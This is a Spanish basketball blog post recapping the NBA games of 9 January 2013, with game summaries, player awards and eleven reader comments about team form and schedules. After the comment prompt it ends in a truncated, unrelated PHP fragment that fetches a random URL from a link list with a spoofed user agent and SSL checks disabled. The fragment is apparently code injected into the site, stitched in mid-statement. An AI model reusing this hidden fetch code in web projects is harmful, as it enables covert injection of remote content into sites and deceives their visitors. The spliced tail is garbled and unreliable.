La Crónica: Pozo sin fondo

10 de January de 2013 por Simon

22 equipos entraban ayer en liza en el segundo miércoles del año. Ayer conocíamos que Carmelo Anthony ha sido suspendido con 1 partido por su altercado con Kevin Garnett y se confirmó que Varejao y Love no volverán por lo menos hasta marzo, sino más. En lo que atañe a la jornada, Boston y Milwaukee volvieron a ganar y Philadelphia continúa en crisis. Si la tendencia se mantiene una o dos semanas más, ya podremos decir que los Play Off del Este están completados a mitad de Enero.

El equipo que cada vez lo tiene más negro es LA Lakers. Sin sus dos mejores internos, sumaron su quinta derrota consecutiva y cada vez están más cerca del pozo de la conferencia y más lejos de los Play Off. San Antonio tuvo un partido relativamente plácido, todo el tiempo con ventajas de 8 o 10 puntos, pero un arreón angelino comprometió la victoria. Incluso Bryant llegó a tener una última jugada para empatar pero falló. Duncan no tuvo su día y estuvo muy fallón, pero Ginobili y Parker estuvieron soberbios para guiar a los de Popovich a la victoria. Buenos partidos de Bryant y World Peace, y sorprendentes 22 puntos y 13 rebotes de Clark (105-108). 

Memphis tenía una complicada visita ante un rival directo como los Golden State Warriors en la pelea por la ventaja de campo en una hipotética primera ronda de Play Off. Memphis logró imponer su estilo durante el partido, sobre todo en la segunda mitad, lo que les hizo llevarse el gato al agua. Todos los titulares Grizzlies superaron los 10 puntos, destacando los 19 y los 18 puntos de Randolph y Gay respectivamente. Curry y Thompson cuajaron un buen partido pero estuvieron muy solos anoche. Lee bajó un poco sus prestaciones pero aún así consiguió 14 puntos y 10 rebotes, insuficientes ante el potencial Grizzlies (94-87).

Boston logró su cuarta victoria consecutiva en un tosco partido ante Phoenix Suns. Solo consultando el marcador podemos notar que no fue un partido de muchos quilates. Tras varias rachas de ambos equipos, en el último cuarto Boston se puso verdaderamente el mono de trabajo y cerró un partido que no podía escaparse a los de Doc Rivers. Los Celtics vieron anoche como la mayor aportación les llegaba desde el banquillo con  14,13 y 12 puntos de Green, Terry y Sullinger respectivamente, a los que el rookie añadió 16 rebotes (79-87).

Los Clippers lograron una trabajada victoria ante unos Dallas Maverics que llegaron vivos hasta el final, lo que es un ligero pero buen síntoma de mejora para la franquicia de Mark Cuban en su nefasta racha de los últimos partidos. Collison fue el que mantuvo anoche a los Mavericks  ante el poco acierto que sigue mostrando Nowitzki tras volver de su lesión y la irregularidad de OJ Mayo. Por parte de Clippers, la típica gran aportación del banquillo unida al buen hacer de Paul y Griffin les mantiene en lo más alto de la clasificación en un día que la victoria era vital pues todos los perseguidores habían ganado su partido. 19 puntos y 16 asistencias para el jugón de Chris Paul que cada vez asoma más la cabecita en la lucha por el MVP (93-99).

Oklahoma City Thunder no pierde el paso de Clippers y logró una cómoda victoria en casa ante Minnesota Timberwolves. Tras una primera parte bastante igualada gracias al buen hacer de los europeos del este de los Wolves (Pekovic Shved y Kirilenko), Durantula apretó el acelerador y los de Minny se quedaron sin coche para seguir el arreón. Finalmente, victoria de 22 para Thunder que tuvieron en Westbrook y Durant sus habituales grandes aportaciones. Ibaka estuvo bastante flojo anoche (84-106).

Milwaukee superó de nuevo los 100 puntos en el segundo partido sin Scott Skiles y lo hicieron ante la férrea defensa de Chicago y en el United Center, lo que da más mérito a su actuación. Chicago empezó el partido muy bien y consiguió amplias ventajas desde el inicio pero en la segunda parte Milwaukee con un Sanders que taponaba todo lo que se acercaba a la zona y un Jennings desatado logró llevarse el partido de forma brillante en una cancha muy complicada. Jennings acabó el partido con 35 puntos, Dunleavy aportó 16 desde el banco y Sanders aportó 12 rebotes y la espectacular cifra de 7 tapones. En los Bulls, Boozer fue, una vez más, el mejor (104-96).

En el resto de la jornada, los Hornets dejaron a Houston en tan solo 79 puntos, algo sorprendente teniendo en cuenta que los Rockets se van prácticamente todas las noches por encima de los 100. Roger Mason fue el jugador clave para New Orleans anotando 17 puntos en apenas 16 minutos y defendiendo perfectamente a Harden en un último cuarto en el que Hornets entró  10 abajo y terminó el partido ganando de 9 puntos (79-88). Denver ganó a Magic en un partido típico de estos últimos en el que compiten muy bien durante todo el encuentro pero en los minutos finales nadie es capaz de anotar. Sin duda, inmerecida la racha de 10 derrotas seguidas que lleva Orlando. El mejor Nuggets fue Faried con 19 puntos y otros tantos rebotes (105-108).

Cleveland ganó a unos Hawks en crisis con un Irving espectacular autor de 35 puntos, bien apoyado por Zeller y Thompson con sendos dobles dobles. Atlanta sigue con su mala racha que les hace perder el tercer puesto de la conferencia a favor de Indiana Pacers.  Pésima imagen ante uno de los peores equipos de la liga (83-99). Utah venció sin problemas en Charlotte gracias a un partidazo de Jefferson (112-102). Para terminar, Toronto se aprovechó del mal momento de los 76ers para abusar de ellos en el Air Canada Center. Apenas Holiday y Young dieron la cara en Philadelphia. Los mejores Raptors fueron Amir Johnson y Ed Davis con 19 puntos y 12 rebotes y 17 y 9 respectivamente. Calderon, que se ha hecho con la titularidad definitivamente,  consiguió 14 puntos y 11 asistencias. Probablemente esté  jugando el mejor baloncesto  desde que llegó a la liga (72-90).

PREMIOS

MVP: Noche de bases. Chris Paul repartió 16 asistencias, más 16 puntos y 5 rebotes en la 13ª victoria consecutiva de Clippers en casa e Kyrie Irving brilló con 33 puntos ante Atlanta, pero nos quedamos con la sensacional actuación de Brandon Jennings con 35-6-6 en la segunda victoria de dos partidos sin Skiles al mando.

Rookie: Nos preguntábamos hace poco qué podían hacer los Celtics para mejorar su juego. La respuesta la pudo ofrecer ayer Jared Sullinger siendo el mejor de los suyos en la victoria ante Phoenix. 12 puntos, 16 rebotazos, 3 asistencias, más un tapón y otro robo. Completísimo.

Sorpresa: La baja de Pau y Howard es una oportunidad para algunos que no se debe desaprovechar. Earl Clark lo hizo destapándose con un partidón de 22 puntos, 13 rebotes y 3 asistencias. Tampoco sirvió para romper la mala racha de los amarillos.

Decepción: Es el termómetro de la gran temporada de los Warriors y candidato fuerte a mejor 6º del año. Jarrett Jack no tuvo su día y se quedó en 3 puntos y 5 asistencias en la segunda derrota consecutiva de su equipo.

Esfuerzo en vano: Partidazo de Jameer Nelson aguantando a los suyos hasta los últimos momentos ante Denver. Rozó la victoria con sus 20 puntos y 8 asistencias. También debemos destacar lo de Metta World Peace, camino del triple doble y jugando por dentro ante Duncan. Por causas propias y ajenas a Gasol le están preparando una alfombra en la salida.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

11 comentarios a esta entrada

  1. Ruxixón dice:
    #1

    Calendario de los Lakers

    4 seguidos en el Staples contra Oklahoma,Cleveland,Milwaukee y Miami
    3 fuera contra Toronto,Chicago y Memphis
    3 seguidos en casa contra Utah,Oklahoma y New Orleans
    Acaban el mes fuera contra Phoenix

    Ojo a este mes que como vengan mal dadas -no lo creo pero lo que demuestran hasta ahora es que pueden perder contra cualquier ewquipo- pueden quedar muy tocados para clasificarse para PO.

    Por cierto,manifiesto mi alegría porque los Supersonics vuelvan a la NBA,esa camiseta verde molona caerá en cuanto sea oficial el equipo aunque es una lástima que sea a costa de la ciudad de Sacramento.Hay imcompetentes en todo el mundo ;¿volverá algún equipo NBA allí?de momento parece que Anaheim será la siguiente ciudad en irrumpir en la NBA aunque quizás no interese esa concentración de mercado entre Lakers,Clippers y el equipo que pudiera salir de allí.

      Citar

  2. Kantonyo dice:
    #2

    Que tiene que hacer Greivis Vasquez para qué le deis bola en el blog?????

    Lleva unas semanas a un nivel enorme.

      Citar

  3. Jose Luis dice:
    #3

    La verdad es que lleva 2-3 semanas muy bien, y su temporada es de notable casi excelente para lo que puede dar. Un buen base que ha encontrado su sitio.

      Citar

  4. Viva_Dirk dice:
    #4

    Kantonyo eso será cosa de Deer&Txus, que querrán comprarlo barato en alguna fantasy y no quieren levantar a liebre, jeje. Por mi parte le di como MIP y creo que ahora mismo es el máximo candidato junto a Larry Sanders.

    Ya de paso hablamos un poco de los Hornets que desde que ha vuelto Gordon tienen un balance de 4-1. Con el a buen nivel son un equipo buenísimo, casi todos sus jugadores importantes son jugadores ultracompetitivos y jóvenes.

    Respecto a los Lakers, tienen que aguantar ahora sin Howard al menos 4-5 partidos, lo de Pau parece mas leve. Pero si de los 11 partidos que ha puesto Ruxixón los Lakers hacen balance positivo sería una gran señal…a la espera de que se muevan para traspasar a Pau, no hay otro camino.

      Citar

  5. Esteban dice:
    #5

    gran momento del joven equipo de los hornets, con gordon son otro equipo y han ganado 4 de 5 juegos con el

    si vemos la edad de gordon , anderson, vazquez, lopez, aminu y los rookies davis y rivers, muestran un potencial enorme a futuro

    da la sensacion que si hubiesen estao sanos davis y gordon toda la temporada estarian 15-20

      Citar

  6. Esteban dice:
    #6

    terrible levantada de los celtics vuando parecia que estaban para quedar fuera de PO, ahora comienzan a asustar a otros equipos

    la llegada de bradley no solo los hace mejores defesnores, sino que les da una banca con 3 tios muy rendidores como terry, green y sullinger,

    aun asi me sigue poareciendo poco si lo que quieren es ganar el campeonato, pero van bien, no les vendria nada mal lograr un trade por algun jugador algo mas valioso que barbosa, lee y wilcox

      Citar

  7. Blade Petrovic dice:
    #7

    Podriais poner en miscelanes los diferentes top ten del año?Gracias

      Citar

  8. Jose Luis dice:
    #8

    ¿a que te refieres? ¿top ten de asistencias/jugadas/tapones/mates, etc?

    quedaría muy chulo, es verdad

      Citar

  9. txusma dice:
    #9

    Blade Petrovic:
    Podriais poner en miscelanes los diferentes top ten del año?Gracias

    Venga, dadnos un poco de tiempo

      Citar

  10. GreenPride dice:
    #10

    Jornada de partidos interesantes. Los Lakers siguen perdiendo aunque ahora sin jugadores interiores no se puede ser tan crítico con ellos. El calendario que pone Ruxixón yo lo veo temible para ellos en este mes. De los 11 partidos 7 son contra equipos de PO y de los los 4 que no lo son dos de ellos (Toronto y New Orleans) están en rachas muy positivas. Por tanto 9 de 11 partidos difíciles a priori y con 3 de los 11 contra Thunder (2) y Heat. Un calendario temible para ellos. De momento están a 5 partidos de entrar en PO y o empiezan rápido a ganar con consistencia o puede ocurrir la catástrofe de que quedaran fuera.
    En Boston los Celtics parecen haber encontrado us camino tras la vuelta de Bradley. El equipo hace que su defensa se parezca a la de años anteriores y han conseguido que su banco produzca en condiciones. El rookie Sullinger está que se sale y hasta Terry da señales de mejoría. Veremos si es una mejoria definitiva porque tienen varios equipos a tiro para poder todavía colocarse bien si confirman su buena racha.
    En Oakland, los Grizzlies confirmaron que son más equipo que los Warriors. Valiosísima victoria para Memphis que parece recuperar el hilo de manos de su buena defensa. Interesante aportación de Arthur que sumar a los habituales. Por los Warriors difícil ganar jugando a ritmo lento, necesitan partidos muy vivos para ganar a los mejores. Tras una primera parte de la temporada fenomenal creo que podrían entrar en problemas a partir de ahora sobre todo en partidos contra los mejores. Aún así, Curry y Thompson son muy buenos.
    Clippers y Thunder suman y siguen. Los vecinos “pobres” de LA se han ganado ser ya considerados contenders al anillo y así lo demuestran contínuamente de la mano de CP3. Los Thunder ganan casi por inercia y siguen siendo favoritos en el Oeste

      Citar

  11. Jose Luis dice:
    #11

    http://www.youtube.com/watch?feature=player_embedded&v=cwq2vBi0H-E

    Qué pena que fue Amundson el que recibió el pase, no supo ni qué hacer con la bola, que mal la soltó al tablero.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>